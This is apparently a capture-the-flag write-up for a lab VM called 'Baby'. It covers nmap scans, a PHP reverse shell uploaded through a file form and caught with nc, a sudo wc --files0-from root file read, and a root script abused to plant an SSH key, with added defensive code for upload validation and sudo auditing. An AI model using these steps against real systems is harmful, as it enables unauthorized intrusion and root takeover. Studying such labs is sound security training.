```
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:10 CST
Nmap scan report for 192.168.2.1
Host is up (0.00069s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:59:EA:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.21
Host is up (0.0013s latency).
MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.19 seconds
```
Target IP: 192.168.2.21
2. Port scanning
1. Full port scan
```
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:10 CST
Nmap scan report for 192.168.2.21
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.71 seconds
```
```
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:11 CST
Nmap scan report for 192.168.2.21
Host is up (0.0013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
```
3. UDP scan
```
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:12 CST
Nmap scan report for 192.168.2.21
Host is up (0.00091s latency).
All 100 scanned ports on 192.168.2.21 are in ignored states.
Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response)
MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 48.69 seconds
```
II. Web penetration
Port 80 serves a file upload page.
Uploading a shell script succeeds.
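The upload handler on port 80 accepted a PHP file and the web server later executed it. As an added example (not the box's code and not from this writeup), this is the server-side check a defender would put in front of such a handler: an extension allowlist, exactly one extension (so `rev.php` and `shell.php.jpg` are both refused), a magic-byte check so the content must match the claimed type, and a random server-chosen storage name so the client never picks the file name. Storing the result outside the web root is assumed to be handled by the caller.

```python
import os
import secrets

# Allowed extensions mapped to the leading bytes each format must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def validate_upload(filename, head):
    """Check a client-supplied file name and the first bytes of its content.

    Returns (True, storage_name) for an acceptable file, where storage_name is
    a server-chosen random name carrying only the verified extension, or
    (False, reason) for anything rejected.
    """
    # Strip any directory component the client sent (Windows or POSIX style).
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # Exactly one extension: this rejects rev.php, shell.php.jpg and dotfiles.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "file name must be name.ext with a single extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not allowed"
    # The content must look like the format the extension claims.
    if not head.startswith(ALLOWED[ext]):
        return False, "content does not match the claimed type"
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: a PHP upload like the one on this box, and a real JPEG header.
    print(validate_upload("rev.php", b"<?php"))
    print(validate_upload("photo.jpg", b"\xff\xd8\xff\xe0JFIF"))
```

The handler should call `validate_upload` with the original file name and the first few bytes of the body, and only then write the body under the returned name; the extension check alone is not enough, which is why the content check and the server-chosen name are part of the same function.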
III. Getting www-data privileges
Visiting rev.php triggers the reverse shell and gives a www-data shell:
```
┌──(root㉿kali)-[/tools]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.21] 53386
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@Baby:/var/www/html$ su aaa
Password:
aaa@Baby:/var/www/html$ id
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
```
Check sudo -l:
```
aaa@Baby:/$ sudo -l
Matching Defaults entries for aaa on Baby:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User aaa may run the following commands on Baby:
    (ALL) NOPASSWD: /usr/bin/wc
```
/usr/bin/wc can be run as root without a password.
/usr/bin/wc can be used to read files:
```
LFILE=file_to_read
sudo wc --files0-from "$LFILE"
```
2. Getting ccc privileges
Trying the root password to log in works, and the session switches to ccc:
```
aaa@Baby:/$ su ccc
Password:
ccc@Baby:/$ id
uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)
```
Check sudo -l:
```
ccc@Baby:/$ sudo -l
Matching Defaults entries for ccc on Baby:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ccc may run the following commands on Baby:
    (ALL) NOPASSWD: /opt/ccc.sh
```
/opt/ccc.sh can be run as root.
3. Getting root privileges
As user aaa, use /usr/bin/wc to read the contents of /opt/ccc.sh:
```
aaa@Baby:/$ sudo /usr/bin/wc --files0-from /opt/ccc.sh
/usr/bin/wc: '#!/bin/bash'$'\n\n''cp /home/ccc/.ssh/id_rsa.pub /root/.ssh/authorized_keys'$'\n': No such file or directory
```
The script copies /home/ccc/.ssh/id_rsa.pub into /root/.ssh/authorized_keys, so as ccc first generate a key pair:

```
ccc@Baby:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ccc/.ssh/id_rsa):
Created directory '/home/ccc/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/ccc/.ssh/id_rsa
Your public key has been saved in /home/ccc/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:PhHTjSU1RV8m3T+JHSaD8XHA67hTmVGNU8MvKSQ41xU ccc@Baby
The key's randomart image is:
+---[RSA 3072]----+
|        ..+B*EB*|
|       o.o*+==O*|
|       oooo..Oo*|
|        o .+o+o|
|        S o.+..|
|       . . . = |
|        o o    |
|       . o     |
|        .      |
+----[SHA256]-----+
```
Run /opt/ccc.sh:
```
ccc@Baby:~/.ssh$ sudo /opt/ccc.sh
```
Root access obtained:
```
ccc@Baby:~/.ssh$ ssh root@127.0.0.1 -i id_rsa
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux Baby 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 12 03:42:24 2025 from 192.168.3.94
root@Baby:~# id
uid=0(root) gid=0(root) groups=0(root)
```
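Both escalations on this box come from sudo rules: aaa may run `/usr/bin/wc` as root without a password, which reads any file named on its command line, and ccc may run `/opt/ccc.sh` as root, a script that takes its input from a path under `/home/ccc/` that ccc controls. As an added example (not the box's code and not part of this writeup), the audit below parses `sudo -l` output in the exact form shown above and reports both patterns. The two `sudo -l` outputs and the script body are embedded as constructed input copied from this page; the `FILE_READERS` set and the "reads from a user's home" rule are my own audit heuristics, not something the page defines.

```python
import re

# Constructed input: the two `sudo -l` outputs from this box, concatenated.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for aaa on Baby:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User aaa may run the following commands on Baby:
    (ALL) NOPASSWD: /usr/bin/wc

Matching Defaults entries for ccc on Baby:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ccc may run the following commands on Baby:
    (ALL) NOPASSWD: /opt/ccc.sh
"""

# Constructed stand-in for reading the script from disk; body as recovered on the box.
SCRIPTS = {
    "/opt/ccc.sh": "#!/bin/bash\n\ncp /home/ccc/.ssh/id_rsa.pub /root/.ssh/authorized_keys\n",
}

# Binaries that read any file named on their command line (wc via --files0-from
# is the one on this page; extend the set from your own review).
FILE_READERS = {"/usr/bin/wc"}

USER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on \S+:")
ENTRY_RE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")
HOME_PATH_RE = re.compile(r"/home/(?P<owner>[^/\s]+)/")


def parse_sudo_l(text):
    """Turn `sudo -l` output into a list of {user, runas, nopasswd, cmd} dicts."""
    entries, user = [], None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m["user"]
            continue
        m = ENTRY_RE.match(line)
        if m and user is not None:
            entries.append({
                "user": user,
                "runas": m["runas"],
                "nopasswd": "NOPASSWD:" in m["tags"],
                "cmd": m["cmd"].strip(),
            })
    return entries


def audit_entry(entry, scripts=SCRIPTS):
    """Return human-readable findings for one sudo entry (empty list if clean)."""
    findings = []
    if not entry["nopasswd"]:
        return findings
    binary = entry["cmd"].split()[0]
    if binary in FILE_READERS:
        findings.append(
            f"{entry['user']}: {binary} runs as {entry['runas']} with no password "
            f"and will read any file named on its command line"
        )
    body = scripts.get(binary)
    if body is not None:
        # A root script that consumes a path under /home/<user>/ lets that user
        # decide what root acts on; here it is the key root will later trust.
        for owner in sorted(set(HOME_PATH_RE.findall(body))):
            findings.append(
                f"{entry['user']}: {binary} runs as {entry['runas']} but takes input "
                f"from /home/{owner}/, a path user {owner} controls"
            )
    return findings


def audit(text=SUDO_L_OUTPUT, scripts=SCRIPTS):
    """Audit every entry found in `sudo -l` output and collect the findings."""
    findings = []
    for entry in parse_sudo_l(text):
        findings.extend(audit_entry(entry, scripts))
    return findings


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

On a real host the `scripts` mapping would be filled by reading each NOPASSWD target from disk; the fix for both findings is the same as the lesson of this box: a NOPASSWD rule for a binary that reads files is a root file read, and a root script must not take its input from a directory the invoking user can write to.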